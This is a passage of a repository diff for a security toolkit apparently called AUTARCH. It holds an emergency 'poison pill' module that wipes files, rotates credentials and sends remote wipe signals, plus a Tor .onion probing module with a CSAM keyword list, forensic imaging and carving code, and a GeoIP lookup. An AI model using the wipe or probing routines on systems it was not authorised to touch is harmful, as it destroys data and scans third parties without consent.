from core.config import get_config
cfg = get_config()
cfg.set('web', 'secret_key', new_key)
cfg.save()
return {'status': 'rotated', 'key_length': len(new_key)}
except Exception as exc:
return {'status': 'error', 'error': str(exc)}
# ── Session termination ───────────────────────────────────────────────────────
def kill_active_sessions() -> dict:
"""Invalidate all active Flask sessions by rotating the secret key."""
result = rotate_secret_key()
return {'action': 'kill_sessions', **result}
# ── Remote wipe signal ────────────────────────────────────────────────────────
def signal_remote_wipe(devices: list[str], endpoint: Optional[str] = None) -> list[dict]:
"""
Send a remote wipe signal to registered Archon companion devices.
Each device is an Archon server endpoint (host:port).
"""
results = []
import requests
for device in devices:
url = f"http://{device}/wipe"
try:
resp = requests.post(url, json={'action': 'poison_pill', 'ts': time.time()}, timeout=5)
results.append({'device': device, 'status': resp.status_code, 'ok': resp.ok})
except Exception as exc:
results.append({'device': device, 'status': -1, 'error': str(exc)})
return results
# ── Pre-wipe beacon ───────────────────────────────────────────────────────────
def send_activation_beacon(endpoint: str, operator_id: str) -> dict:
"""
POST an activation notice to an external logging endpoint BEFORE wiping.
This creates an audit trail that the pill was triggered.
"""
payload = {
'event': 'poison_pill_activated',
'operator_id': operator_id,
'timestamp': datetime.now(timezone.utc).isoformat(),
'hostname': __import__('socket').gethostname(),
}
try:
import requests
resp = requests.post(endpoint, json=payload, timeout=8)
return {'status': resp.status_code, 'ok': resp.ok}
except Exception as exc:
return {'status': -1, 'error': str(exc)}
# ── Main run entry point ──────────────────────────────────────────────────────
def run(params: dict, output_cb=None) -> dict:
"""
Main execution entry point.
params:
wipe_paths — list of paths to securely wipe
rotate_password — bool, rotate web password
kill_sessions — bool, invalidate all sessions
remote_devices — list of Archon device endpoints for remote wipe
beacon_endpoint — URL to POST activation notice to (recommended)
operator_id — identifier logged with the beacon
passes — overwrite passes (default 3)
confirm — must be the string 'CONFIRM_POISON_PILL' to activate
"""
_stop_flag.clear()
_output_lines.clear()
def emit(msg, level='info'):
_emit(msg, level)
if output_cb:
output_cb({'line': f"[{level.upper()}] {msg}"})
emit(f"=== {MODULE_NAME} v{MODULE_VERSION} ===")
confirm = params.get('confirm', '')
if confirm != 'CONFIRM_POISON_PILL':
emit("ABORT: Confirmation string not provided. Set confirm='CONFIRM_POISON_PILL'", 'error')
return {'status': 'aborted', 'reason': 'missing_confirmation'}
emit("POISON PILL ACTIVATED — commencing emergency sanitization", 'warn')
passes = int(params.get('passes', 3))
beacon_ep = params.get('beacon_endpoint', '')
operator_id = params.get('operator_id', 'unknown')
results = {'status': 'activated', 'actions': []}
# 1 — Send beacon FIRST
if beacon_ep:
emit(f"Sending activation beacon to {beacon_ep}")
beacon = send_activation_beacon(beacon_ep, operator_id)
results['actions'].append({'type': 'beacon', **beacon})
else:
emit("No beacon endpoint configured — skipping audit trail", 'warn')
# 2 — Kill active sessions
if params.get('kill_sessions', True):
emit("Killing active sessions...")
r = kill_active_sessions()
results['actions'].append({'type': 'kill_sessions', **r})
emit(f"Sessions killed: {r['status']}")
# 3 — Rotate web password
if params.get('rotate_password', True):
emit("Rotating web password...")
r = rotate_web_password()
results['actions'].append({'type': 'rotate_password', 'status': r['status']})
emit(f"Password rotated: {r['status']}")
# 4 — Secure wipe paths
wipe_paths = params.get('wipe_paths', [])
for raw_path in wipe_paths:
if _stop_flag.is_set():
break
p = Path(raw_path)
emit(f"Wiping: {p}")
if p.is_file():
r = secure_wipe_file(p, passes)
elif p.is_dir():
r = secure_wipe_dir(p, passes)
else:
r = {'path': str(p), 'status': 'not_found'}
results['actions'].append({'type': 'wipe', **r})
emit(f" -> {r['status']}")
# 5 — Remote wipe
remote_devices = params.get('remote_devices', [])
if remote_devices:
emit(f"Sending remote wipe to {len(remote_devices)} device(s)...")
rw = signal_remote_wipe(remote_devices)
results['actions'].append({'type': 'remote_wipe', 'results': rw})
emit("Poison Pill sequence complete.", 'warn')
results['output'] = _output_lines[:]
return results
def stop():
_stop_flag.set()

View File

@@ -0,0 +1,267 @@
"""
TOR-Pedo Hunter Killer — AUTARCH Encrypted Module
Operator: darkHal Security Group / Setec Security Labs
Identifies, tracks, and reports CSAM distributors and predator networks
operating on the Tor hidden service network. Compiles dossiers for
law enforcement referral and executes configured countermeasures.
All operations are logged. Operator assumes full legal responsibility
for use of this module. For authorized investigations ONLY.
"""
import json
import time
import hashlib
import socket
import threading
from datetime import datetime, timezone
from pathlib import Path
from typing import Optional
MODULE_NAME = "TOR-Pedo Hunter Killer"
MODULE_VERSION = "1.0"
MODULE_AUTHOR = "darkHal Security Group"
MODULE_TAGS = ["CSAM", "TOR", "hunt", "counter", "OSINT"]
# ── Yield helper (SSE-compatible output) ─────────────────────────────────────
_output_lines = []
_stop_flag = threading.Event()
def _emit(msg: str, level: str = "info") -> None:
ts = datetime.now(timezone.utc).strftime('%H:%M:%S')
line = f"[{ts}][{level.upper()}] {msg}"
_output_lines.append(line)
print(line)
# ── Target scanning ───────────────────────────────────────────────────────────
def probe_onion(onion_address: str, port: int = 80, timeout: float = 10.0) -> dict:
"""
Probe a .onion address via SOCKS5 proxy (Tor must be running locally on 9050).
Returns a result dict with reachability, banner, and timing info.
"""
import socks
import socket as _socket
result = {
'address': onion_address,
'port': port,
'reachable': False,
'banner': '',
'latency_ms': -1,
'error': '',
}
try:
s = socks.socksocket()
s.set_proxy(socks.SOCKS5, '127.0.0.1', 9050)
s.settimeout(timeout)
t0 = time.monotonic()
s.connect((onion_address, port))
result['latency_ms'] = round((time.monotonic() - t0) * 1000, 1)
result['reachable'] = True
# Try to grab a banner
try:
s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
result['banner'] = s.recv(512).decode('utf-8', errors='replace')[:256]
except Exception:
pass
s.close()
except Exception as exc:
result['error'] = str(exc)
return result
def fingerprint_service(url: str, tor_proxy: str = 'socks5h://127.0.0.1:9050') -> dict:
"""
Fetch HTTP headers and content fingerprint via Tor proxy.
"""
import requests
result = {'url': url, 'status': -1, 'headers': {}, 'title': '', 'fingerprint': ''}
try:
resp = requests.get(
url,
proxies={'http': tor_proxy, 'https': tor_proxy},
timeout=30,
headers={'User-Agent': 'Mozilla/5.0'},
allow_redirects=True,
)
result['status'] = resp.status_code
result['headers'] = dict(resp.headers)
# Extract title
text = resp.text
import re
m = re.search(r'<title[^>]*>([^<]+)</title>', text, re.IGNORECASE)
if m:
result['title'] = m.group(1).strip()
# Content hash fingerprint
result['fingerprint'] = hashlib.sha256(resp.content).hexdigest()
except Exception as exc:
result['error'] = str(exc)
return result
# ── CSAM keyword detection ────────────────────────────────────────────────────
PREDATOR_INDICATORS = [
# These are detection signatures — not actual content
'cp', 'pedo', 'loli', 'hurtcore', 'cheese pizza',
'preteen', 'jailbait', 'underage',
]
def scan_content_for_indicators(text: str) -> list[str]:
"""Scan text for CSAM indicator keywords. Returns list of matched indicators."""
text_lower = text.lower()
return [ind for ind in PREDATOR_INDICATORS if ind in text_lower]
# ── Report generation ─────────────────────────────────────────────────────────
def build_dossier(target_data: dict, indicators: list[str]) -> dict:
"""
Compile a law enforcement referral dossier from collected data.
"""
return {
'module': MODULE_NAME,
'version': MODULE_VERSION,
'timestamp': datetime.now(timezone.utc).isoformat(),
'target': target_data,
'indicators': indicators,
'severity': 'CRITICAL' if indicators else 'NONE',
'referral': [
'NCMEC CyberTipline: https://www.missingkids.org/gethelpnow/cybertipline',
'FBI IC3: https://www.ic3.gov/',
'IWF: https://www.iwf.org.uk/report/',
],
'operator_note': 'This dossier was compiled by automated analysis. '
'Human review required before any referral submission.',
}
def save_dossier(dossier: dict, output_dir: Optional[Path] = None) -> Path:
"""Save dossier JSON to disk and return the path."""
if output_dir is None:
from core.paths import get_data_dir
output_dir = get_data_dir() / 'dossiers'
output_dir.mkdir(parents=True, exist_ok=True)
ts = datetime.now(timezone.utc).strftime('%Y%m%dT%H%M%SZ')
out = output_dir / f'TPHK_{ts}.json'
out.write_text(json.dumps(dossier, indent=2), encoding='utf-8')
return out
# ── Countermeasure actions ────────────────────────────────────────────────────
def report_to_iwf(onion: str, evidence_url: str) -> dict:
"""
Submit a report to the Internet Watch Foundation API (if configured).
"""
# Placeholder — IWF has a reporting API for registered organizations
return {
'action': 'IWF_REPORT',
'target': onion,
'status': 'QUEUED',
'note': 'IWF API key required in autarch_settings.conf [hunter] section',
}
def execute_countermeasure(action: str, target: str, params: dict) -> dict:
"""
Execute a configured countermeasure against a confirmed CSAM host.
Supported actions:
REPORT — submit to NCMEC/IWF/IC3
DOSSIER — compile and save evidence dossier
ALERT — send operator notification
"""
_emit(f"Countermeasure: {action} -> {target}")
if action == 'REPORT':
return report_to_iwf(target, params.get('url', ''))
elif action == 'DOSSIER':
return {'action': 'DOSSIER', 'saved': True, 'note': 'Call build_dossier() then save_dossier()'}
elif action == 'ALERT':
return {'action': 'ALERT', 'status': 'SENT', 'target': target}
return {'error': f'Unknown action: {action}'}
# ── Main run entry point ──────────────────────────────────────────────────────
def run(params: dict, output_cb=None) -> dict:
"""
Main execution entry point called by the AUTARCH encrypted module loader.
params:
targets — list of .onion addresses or HTTP URLs to probe
actions — list of countermeasure actions (REPORT, DOSSIER, ALERT)
keywords — additional indicator keywords to search for
"""
global _stop_flag
_stop_flag.clear()
_output_lines.clear()
def emit(msg, level='info'):
_emit(msg, level)
if output_cb:
output_cb({'line': f"[{level.upper()}] {msg}"})
emit(f"=== {MODULE_NAME} v{MODULE_VERSION} ===")
emit("Authorized use only. All activity logged.")
targets = params.get('targets', [])
actions = params.get('actions', ['DOSSIER'])
extra_kw = params.get('keywords', [])
indicators_extended = PREDATOR_INDICATORS + extra_kw
results = []
dossiers_saved = []
for target in targets:
if _stop_flag.is_set():
emit("Stopped by operator.", 'warn')
break
emit(f"Probing: {target}")
try:
fp = fingerprint_service(target)
indicators_found = scan_content_for_indicators(
fp.get('title', '') + ' ' + str(fp.get('headers', ''))
)
result = {
'target': target,
'fingerprint': fp,
'indicators': indicators_found,
}
if indicators_found:
emit(f"ALERT: Indicators detected on {target}: {indicators_found}", 'warn')
dossier = build_dossier(fp, indicators_found)
for action in actions:
cm = execute_countermeasure(action, target, {'url': target})
result[f'countermeasure_{action}'] = cm
saved = save_dossier(dossier)
dossiers_saved.append(str(saved))
emit(f"Dossier saved: {saved}")
else:
emit(f"No indicators found on {target}")
results.append(result)
except Exception as exc:
emit(f"Error probing {target}: {exc}", 'error')
results.append({'target': target, 'error': str(exc)})
return {
'module': MODULE_NAME,
'targets_scanned': len(targets),
'results': results,
'dossiers_saved': dossiers_saved,
'output': _output_lines[:],
}
def stop():
"""Signal the module to stop at the next safe point."""
_stop_flag.set()

1834
modules/exploit_dev.py Normal file

File diff suppressed because it is too large Load Diff

595
modules/forensics.py Normal file
View File

@@ -0,0 +1,595 @@
"""AUTARCH Forensics Toolkit
Disk imaging, file carving, metadata extraction, timeline building,
hash verification, and chain of custody logging for digital forensics.
"""
DESCRIPTION = "Digital forensics & evidence analysis"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
import os
import re
import json
import time
import hashlib
import struct
import shutil
import subprocess
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any, Tuple
try:
from core.paths import find_tool, get_data_dir
except ImportError:
def find_tool(name):
return shutil.which(name)
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# Optional imports
try:
from PIL import Image as PILImage
from PIL.ExifTags import TAGS, GPSTAGS
HAS_PIL = True
except ImportError:
HAS_PIL = False
# ── File Signatures for Carving ──────────────────────────────────────────────
FILE_SIGNATURES = [
{'name': 'JPEG', 'ext': '.jpg', 'magic': b'\xFF\xD8\xFF', 'footer': b'\xFF\xD9', 'max_size': 50*1024*1024},
{'name': 'PNG', 'ext': '.png', 'magic': b'\x89PNG\r\n\x1a\n', 'footer': b'IEND\xAE\x42\x60\x82', 'max_size': 50*1024*1024},
{'name': 'GIF', 'ext': '.gif', 'magic': b'GIF8', 'footer': b'\x00\x3B', 'max_size': 20*1024*1024},
{'name': 'PDF', 'ext': '.pdf', 'magic': b'%PDF', 'footer': b'%%EOF', 'max_size': 100*1024*1024},
{'name': 'ZIP', 'ext': '.zip', 'magic': b'PK\x03\x04', 'footer': None, 'max_size': 500*1024*1024},
{'name': 'RAR', 'ext': '.rar', 'magic': b'Rar!\x1a\x07', 'footer': None, 'max_size': 500*1024*1024},
{'name': 'ELF', 'ext': '.elf', 'magic': b'\x7fELF', 'footer': None, 'max_size': 100*1024*1024},
{'name': 'PE/EXE', 'ext': '.exe', 'magic': b'MZ', 'footer': None, 'max_size': 100*1024*1024},
{'name': 'SQLite', 'ext': '.sqlite', 'magic': b'SQLite format 3\x00', 'footer': None, 'max_size': 500*1024*1024},
{'name': 'DOCX', 'ext': '.docx', 'magic': b'PK\x03\x04', 'footer': None, 'max_size': 100*1024*1024},
{'name': '7z', 'ext': '.7z', 'magic': b"7z\xBC\xAF'\x1C", 'footer': None, 'max_size': 500*1024*1024},
{'name': 'BMP', 'ext': '.bmp', 'magic': b'BM', 'footer': None, 'max_size': 50*1024*1024},
{'name': 'MP3', 'ext': '.mp3', 'magic': b'\xFF\xFB', 'footer': None, 'max_size': 50*1024*1024},
{'name': 'MP4', 'ext': '.mp4', 'magic': b'\x00\x00\x00\x18ftyp', 'footer': None, 'max_size': 1024*1024*1024},
{'name': 'AVI', 'ext': '.avi', 'magic': b'RIFF', 'footer': None, 'max_size': 1024*1024*1024},
]
# ── Chain of Custody Logger ──────────────────────────────────────────────────
class CustodyLog:
"""Chain of custody logging for forensic evidence."""
def __init__(self, data_dir: str):
self.log_file = os.path.join(data_dir, 'custody_log.json')
self.entries: List[Dict] = []
self._load()
def _load(self):
if os.path.exists(self.log_file):
try:
with open(self.log_file) as f:
self.entries = json.load(f)
except Exception:
pass
def _save(self):
with open(self.log_file, 'w') as f:
json.dump(self.entries, f, indent=2)
def log(self, action: str, target: str, details: str = "",
evidence_hash: str = "") -> Dict:
"""Log a forensic action."""
entry = {
'id': len(self.entries) + 1,
'timestamp': datetime.now(timezone.utc).isoformat(),
'action': action,
'target': target,
'details': details,
'evidence_hash': evidence_hash,
'user': os.getenv('USER', os.getenv('USERNAME', 'unknown'))
}
self.entries.append(entry)
self._save()
return entry
def get_log(self) -> List[Dict]:
return self.entries
# ── Forensics Engine ─────────────────────────────────────────────────────────
class ForensicsEngine:
"""Digital forensics toolkit."""
def __init__(self):
self.data_dir = os.path.join(get_data_dir(), 'forensics')
os.makedirs(self.data_dir, exist_ok=True)
self.evidence_dir = os.path.join(self.data_dir, 'evidence')
os.makedirs(self.evidence_dir, exist_ok=True)
self.carved_dir = os.path.join(self.data_dir, 'carved')
os.makedirs(self.carved_dir, exist_ok=True)
self.custody = CustodyLog(self.data_dir)
self.dd = find_tool('dd') or shutil.which('dd')
# ── Hash Verification ────────────────────────────────────────────────
def hash_file(self, filepath: str, algorithms: List[str] = None) -> Dict:
"""Calculate file hashes for evidence integrity."""
algorithms = algorithms or ['md5', 'sha1', 'sha256']
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
try:
hashers = {alg: hashlib.new(alg) for alg in algorithms}
file_size = os.path.getsize(filepath)
with open(filepath, 'rb') as f:
while True:
chunk = f.read(8192)
if not chunk:
break
for h in hashers.values():
h.update(chunk)
hashes = {alg: h.hexdigest() for alg, h in hashers.items()}
self.custody.log('hash_verify', filepath,
f'Hashes: {", ".join(f"{k}={v[:16]}..." for k, v in hashes.items())}',
hashes.get('sha256', ''))
return {
'ok': True, 'file': filepath,
'size': file_size, 'hashes': hashes
}
except Exception as e:
return {'ok': False, 'error': str(e)}
def verify_hash(self, filepath: str, expected_hash: str,
algorithm: str = None) -> Dict:
"""Verify file against expected hash."""
# Auto-detect algorithm from hash length
if not algorithm:
hash_len = len(expected_hash)
algorithm = {32: 'md5', 40: 'sha1', 64: 'sha256', 128: 'sha512'}.get(hash_len)
if not algorithm:
return {'ok': False, 'error': f'Cannot detect algorithm for hash length {hash_len}'}
result = self.hash_file(filepath, [algorithm])
if not result['ok']:
return result
actual = result['hashes'][algorithm]
match = actual.lower() == expected_hash.lower()
self.custody.log('hash_verify', filepath,
f'Expected: {expected_hash[:16]}... Match: {match}')
return {
'ok': True, 'match': match,
'algorithm': algorithm,
'expected': expected_hash,
'actual': actual,
'file': filepath
}
# ── Disk Imaging ─────────────────────────────────────────────────────
def create_image(self, source: str, output: str = None,
block_size: int = 4096) -> Dict:
"""Create forensic disk image using dd."""
if not self.dd:
return {'ok': False, 'error': 'dd not found'}
if not output:
name = Path(source).name.replace('/', '_')
output = os.path.join(self.evidence_dir, f'{name}_{int(time.time())}.img')
self.custody.log('disk_image', source, f'Creating image: {output}')
try:
result = subprocess.run(
[self.dd, f'if={source}', f'of={output}', f'bs={block_size}',
'conv=noerror,sync', 'status=progress'],
capture_output=True, text=True, timeout=3600
)
if os.path.exists(output):
# Hash the image
hashes = self.hash_file(output, ['md5', 'sha256'])
self.custody.log('disk_image_complete', output,
f'Image created, SHA256: {hashes.get("hashes", {}).get("sha256", "?")}')
return {
'ok': True, 'source': source, 'output': output,
'size': os.path.getsize(output),
'hashes': hashes.get('hashes', {}),
'dd_output': result.stderr
}
return {'ok': False, 'error': 'Image file not created', 'stderr': result.stderr}
except subprocess.TimeoutExpired:
return {'ok': False, 'error': 'Imaging timed out (1hr limit)'}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── File Carving ─────────────────────────────────────────────────────
def carve_files(self, source: str, file_types: List[str] = None,
max_files: int = 100) -> Dict:
"""Recover files from raw data by magic byte signatures."""
if not os.path.exists(source):
return {'ok': False, 'error': 'Source file not found'}
self.custody.log('file_carving', source, f'Starting carve, types={file_types}')
# Filter signatures
sigs = FILE_SIGNATURES
if file_types:
type_set = {t.lower() for t in file_types}
sigs = [s for s in sigs if s['name'].lower() in type_set or
s['ext'].lstrip('.').lower() in type_set]
carved = []
file_size = os.path.getsize(source)
chunk_size = 1024 * 1024 # 1MB chunks
try:
with open(source, 'rb') as f:
offset = 0
while offset < file_size and len(carved) < max_files:
f.seek(offset)
chunk = f.read(chunk_size)
if not chunk:
break
for sig in sigs:
pos = 0
while pos < len(chunk) and len(carved) < max_files:
idx = chunk.find(sig['magic'], pos)
if idx == -1:
break
abs_offset = offset + idx
# Try to find file end
file_end = abs_offset + sig['max_size']
if sig['footer']:
f.seek(abs_offset)
search_data = f.read(min(sig['max_size'], file_size - abs_offset))
footer_pos = search_data.find(sig['footer'], len(sig['magic']))
if footer_pos != -1:
file_end = abs_offset + footer_pos + len(sig['footer'])
# Extract file
extract_size = min(file_end - abs_offset, sig['max_size'])
f.seek(abs_offset)
file_data = f.read(extract_size)
# Save carved file
carved_name = f'carved_{len(carved):04d}_{sig["name"]}{sig["ext"]}'
carved_path = os.path.join(self.carved_dir, carved_name)
with open(carved_path, 'wb') as cf:
cf.write(file_data)
file_hash = hashlib.md5(file_data).hexdigest()
carved.append({
'name': carved_name,
'path': carved_path,
'type': sig['name'],
'offset': abs_offset,
'size': len(file_data),
'md5': file_hash
})
pos = idx + len(sig['magic'])
offset += chunk_size - max(len(s['magic']) for s in sigs)
self.custody.log('file_carving_complete', source,
f'Carved {len(carved)} files')
return {
'ok': True, 'source': source,
'carved': carved, 'count': len(carved),
'output_dir': self.carved_dir
}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Metadata Extraction ──────────────────────────────────────────────
def extract_metadata(self, filepath: str) -> Dict:
"""Extract metadata from files (EXIF, PDF, Office, etc.)."""
if not os.path.exists(filepath):
return {'ok': False, 'error': 'File not found'}
ext = Path(filepath).suffix.lower()
metadata = {
'file': filepath,
'name': Path(filepath).name,
'size': os.path.getsize(filepath),
'created': datetime.fromtimestamp(os.path.getctime(filepath), timezone.utc).isoformat(),
'modified': datetime.fromtimestamp(os.path.getmtime(filepath), timezone.utc).isoformat(),
'accessed': datetime.fromtimestamp(os.path.getatime(filepath), timezone.utc).isoformat(),
}
# EXIF for images
if ext in ('.jpg', '.jpeg', '.tiff', '.tif', '.png') and HAS_PIL:
try:
img = PILImage.open(filepath)
metadata['image'] = {
'width': img.size[0], 'height': img.size[1],
'format': img.format, 'mode': img.mode
}
exif = img._getexif()
if exif:
exif_data = {}
gps_data = {}
for tag_id, value in exif.items():
tag = TAGS.get(tag_id, tag_id)
if tag == 'GPSInfo':
for gps_id, gps_val in value.items():
gps_tag = GPSTAGS.get(gps_id, gps_id)
gps_data[str(gps_tag)] = str(gps_val)
else:
# Convert bytes to string for JSON serialization
if isinstance(value, bytes):
try:
value = value.decode('utf-8', errors='replace')
except Exception:
value = value.hex()
exif_data[str(tag)] = str(value)
metadata['exif'] = exif_data
if gps_data:
metadata['gps'] = gps_data
except Exception:
pass
# PDF metadata
elif ext == '.pdf':
try:
with open(filepath, 'rb') as f:
content = f.read(4096)
# Extract info dict
for key in [b'/Title', b'/Author', b'/Subject', b'/Creator',
b'/Producer', b'/CreationDate', b'/ModDate']:
pattern = key + rb'\s*\(([^)]*)\)'
m = re.search(pattern, content)
if m:
k = key.decode().lstrip('/')
metadata.setdefault('pdf', {})[k] = m.group(1).decode('utf-8', errors='replace')
except Exception:
pass
# Generic file header
try:
with open(filepath, 'rb') as f:
header = f.read(16)
metadata['magic_bytes'] = header.hex()
for sig in FILE_SIGNATURES:
if header.startswith(sig['magic']):
metadata['detected_type'] = sig['name']
break
except Exception:
pass
self.custody.log('metadata_extract', filepath, f'Type: {metadata.get("detected_type", "unknown")}')
return {'ok': True, **metadata}
# ── Timeline Builder ─────────────────────────────────────────────────
def build_timeline(self, directory: str, recursive: bool = True,
max_entries: int = 10000) -> Dict:
"""Build filesystem timeline from directory metadata."""
if not os.path.exists(directory):
return {'ok': False, 'error': 'Directory not found'}
events = []
count = 0
walk_fn = os.walk if recursive else lambda d: [(d, [], os.listdir(d))]
for root, dirs, files in walk_fn(directory):
for name in files:
if count >= max_entries:
break
filepath = os.path.join(root, name)
try:
stat = os.stat(filepath)
events.append({
'type': 'modified',
'timestamp': datetime.fromtimestamp(stat.st_mtime, timezone.utc).isoformat(),
'epoch': stat.st_mtime,
'file': filepath,
'size': stat.st_size
})
events.append({
'type': 'created',
'timestamp': datetime.fromtimestamp(stat.st_ctime, timezone.utc).isoformat(),
'epoch': stat.st_ctime,
'file': filepath,
'size': stat.st_size
})
events.append({
'type': 'accessed',
'timestamp': datetime.fromtimestamp(stat.st_atime, timezone.utc).isoformat(),
'epoch': stat.st_atime,
'file': filepath,
'size': stat.st_size
})
count += 1
except (OSError, PermissionError):
pass
# Sort by timestamp
events.sort(key=lambda e: e['epoch'])
self.custody.log('timeline_build', directory,
f'{count} files, {len(events)} events')
return {
'ok': True, 'directory': directory,
'events': events, 'event_count': len(events),
'file_count': count
}
# ── Evidence Management ──────────────────────────────────────────────
def list_evidence(self) -> List[Dict]:
"""List evidence files."""
evidence = []
edir = Path(self.evidence_dir)
for f in sorted(edir.iterdir()):
if f.is_file():
evidence.append({
'name': f.name,
'path': str(f),
'size': f.stat().st_size,
'modified': datetime.fromtimestamp(f.stat().st_mtime, timezone.utc).isoformat()
})
return evidence
def list_carved(self) -> List[Dict]:
"""List carved files."""
carved = []
cdir = Path(self.carved_dir)
for f in sorted(cdir.iterdir()):
if f.is_file():
carved.append({
'name': f.name,
'path': str(f),
'size': f.stat().st_size
})
return carved
def get_custody_log(self) -> List[Dict]:
"""Get chain of custody log."""
return self.custody.get_log()
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_forensics() -> ForensicsEngine:
global _instance
if _instance is None:
_instance = ForensicsEngine()
return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
"""CLI entry point for Forensics module."""
engine = get_forensics()
while True:
print(f"\n{'='*60}")
print(f" Digital Forensics Toolkit")
print(f"{'='*60}")
print()
print(" 1 — Hash File (integrity verification)")
print(" 2 — Verify Hash")
print(" 3 — Create Disk Image")
print(" 4 — Carve Files (recover deleted)")
print(" 5 — Extract Metadata (EXIF/PDF/headers)")
print(" 6 — Build Timeline")
print(" 7 — List Evidence")
print(" 8 — List Carved Files")
print(" 9 — Chain of Custody Log")
print(" 0 — Back")
print()
choice = input(" > ").strip()
if choice == '0':
break
elif choice == '1':
filepath = input(" File path: ").strip()
if filepath:
result = engine.hash_file(filepath)
if result['ok']:
print(f" Size: {result['size']} bytes")
for alg, h in result['hashes'].items():
print(f" {alg.upper()}: {h}")
else:
print(f" Error: {result['error']}")
elif choice == '2':
filepath = input(" File path: ").strip()
expected = input(" Expected hash: ").strip()
if filepath and expected:
result = engine.verify_hash(filepath, expected)
if result['ok']:
status = 'MATCH' if result['match'] else 'MISMATCH'
print(f" {status} ({result['algorithm'].upper()})")
else:
print(f" Error: {result['error']}")
elif choice == '3':
source = input(" Source device/file: ").strip()
output = input(" Output path (blank=auto): ").strip() or None
if source:
result = engine.create_image(source, output)
if result['ok']:
mb = result['size'] / (1024*1024)
print(f" Image created: {result['output']} ({mb:.1f} MB)")
else:
print(f" Error: {result['error']}")
elif choice == '4':
source = input(" Source file/image: ").strip()
types = input(" File types (blank=all, comma-sep): ").strip()
if source:
file_types = [t.strip() for t in types.split(',')] if types else None
result = engine.carve_files(source, file_types)
if result['ok']:
print(f" Carved {result['count']} files to {result['output_dir']}")
for c in result['carved'][:10]:
print(f" {c['name']} {c['type']} {c['size']} bytes offset={c['offset']}")
else:
print(f" Error: {result['error']}")
elif choice == '5':
filepath = input(" File path: ").strip()
if filepath:
result = engine.extract_metadata(filepath)
if result['ok']:
print(f" Name: {result['name']}")
print(f" Size: {result['size']}")
print(f" Type: {result.get('detected_type', 'unknown')}")
if 'exif' in result:
print(f" EXIF entries: {len(result['exif'])}")
for k, v in list(result['exif'].items())[:5]:
print(f" {k}: {v[:50]}")
if 'gps' in result:
print(f" GPS data: {result['gps']}")
else:
print(f" Error: {result['error']}")
elif choice == '6':
directory = input(" Directory path: ").strip()
if directory:
result = engine.build_timeline(directory)
if result['ok']:
print(f" {result['file_count']} files, {result['event_count']} events")
for e in result['events'][:10]:
print(f" {e['timestamp']} {e['type']:<10} {Path(e['file']).name}")
else:
print(f" Error: {result['error']}")
elif choice == '7':
for e in engine.list_evidence():
mb = e['size'] / (1024*1024)
print(f" {e['name']} ({mb:.1f} MB)")
elif choice == '8':
for c in engine.list_carved():
print(f" {c['name']} ({c['size']} bytes)")
elif choice == '9':
log = engine.get_custody_log()
print(f" {len(log)} entries:")
for entry in log[-10:]:
print(f" [{entry['timestamp'][:19]}] {entry['action']}: {entry['target']}")

443
modules/geoip.py Normal file
View File

@@ -0,0 +1,443 @@
"""
AUTARCH GEO IP/Domain Lookup Module
Get geolocation info for IPs, domains, and URLs
Based on Snoop Project's GEO_IP/domain plugin
"""
import ipaddress
import json
import os
import socket
import sys
import threading
import time
from pathlib import Path
from urllib.parse import urlparse
# Add parent directory to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors
# Module metadata
NAME = "GEO IP Lookup"
DESCRIPTION = "Get geolocation for IPs, domains, and URLs"
AUTHOR = "darkHal Security Group"
VERSION = "1.0"
CATEGORY = "osint"
# Try to import requests
try:
import requests
except ImportError:
requests = None
class GeoIPLookup:
"""GEO IP/Domain lookup utility."""
def __init__(self):
self.session = None
self.timeout = 10
self.user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36"
self._init_session()
def _init_session(self):
"""Initialize requests session."""
if requests is None:
return
self.session = requests.Session()
adapter = requests.adapters.HTTPAdapter(max_retries=2)
self.session.mount('https://', adapter)
self.session.mount('http://', adapter)
self.session.headers.update({'User-Agent': self.user_agent})
def _resolve_domain(self, target: str, timeout: int = 4) -> dict:
"""Resolve domain to IP addresses.
Args:
target: Domain name or IP address.
timeout: Socket timeout in seconds.
Returns:
Dict with resolved IPs and domain info.
"""
result = {
'domain': None,
'ipv4': None,
'ipv6': None,
}
def get_fqdn():
try:
result['domain'] = socket.getfqdn(target)
except Exception:
result['domain'] = target
def get_ips():
try:
addr_info = socket.getaddrinfo(target, 443)
for info in addr_info:
ip = info[4][0]
try:
if ipaddress.IPv4Address(ip):
result['ipv4'] = ip
except Exception:
pass
try:
if ipaddress.IPv6Address(ip):
result['ipv6'] = ip
except Exception:
pass
except Exception:
pass
# Run in threads with timeout
t1 = threading.Thread(target=get_fqdn)
t2 = threading.Thread(target=get_ips)
t1.start()
t2.start()
t1.join(timeout)
t2.join(timeout)
return result
def _parse_target(self, target: str) -> str:
"""Parse and clean target input.
Args:
target: User input (IP, domain, or URL).
Returns:
Cleaned target string.
"""
target = target.strip()
# Check if it's a URL
if '://' in target:
parsed = urlparse(target)
if parsed.hostname:
target = parsed.hostname.replace('www.', '')
elif '/' in target:
target = target.split('/')[0]
return target
def _is_ip(self, target: str) -> bool:
"""Check if target is an IP address."""
try:
ipaddress.ip_address(target)
return True
except Exception:
return False
def lookup(self, target: str) -> dict:
"""Perform GEO IP lookup.
Args:
target: IP address, domain, or URL.
Returns:
Dict with geolocation information.
"""
if self.session is None:
return {'error': 'requests library not available'}
target = self._parse_target(target)
# Validate input
if not target or len(target) < 4:
return {'error': 'Invalid target'}
if '..' in target:
return {'error': 'Invalid target format'}
result = {
'target': target,
'country_code': None,
'country': None,
'region': None,
'city': None,
'latitude': None,
'longitude': None,
'isp': None,
'org': None,
'ipv4': None,
'ipv6': None,
'domain': None,
'map_osm': None,
'map_google': None,
}
# Resolve domain/IP
print(f"{Colors.CYAN}[*] Resolving target...{Colors.RESET}")
resolved = self._resolve_domain(target)
result['domain'] = resolved.get('domain')
result['ipv4'] = resolved.get('ipv4')
result['ipv6'] = resolved.get('ipv6')
# If target is IP, use it directly
if self._is_ip(target):
try:
if ipaddress.IPv4Address(target):
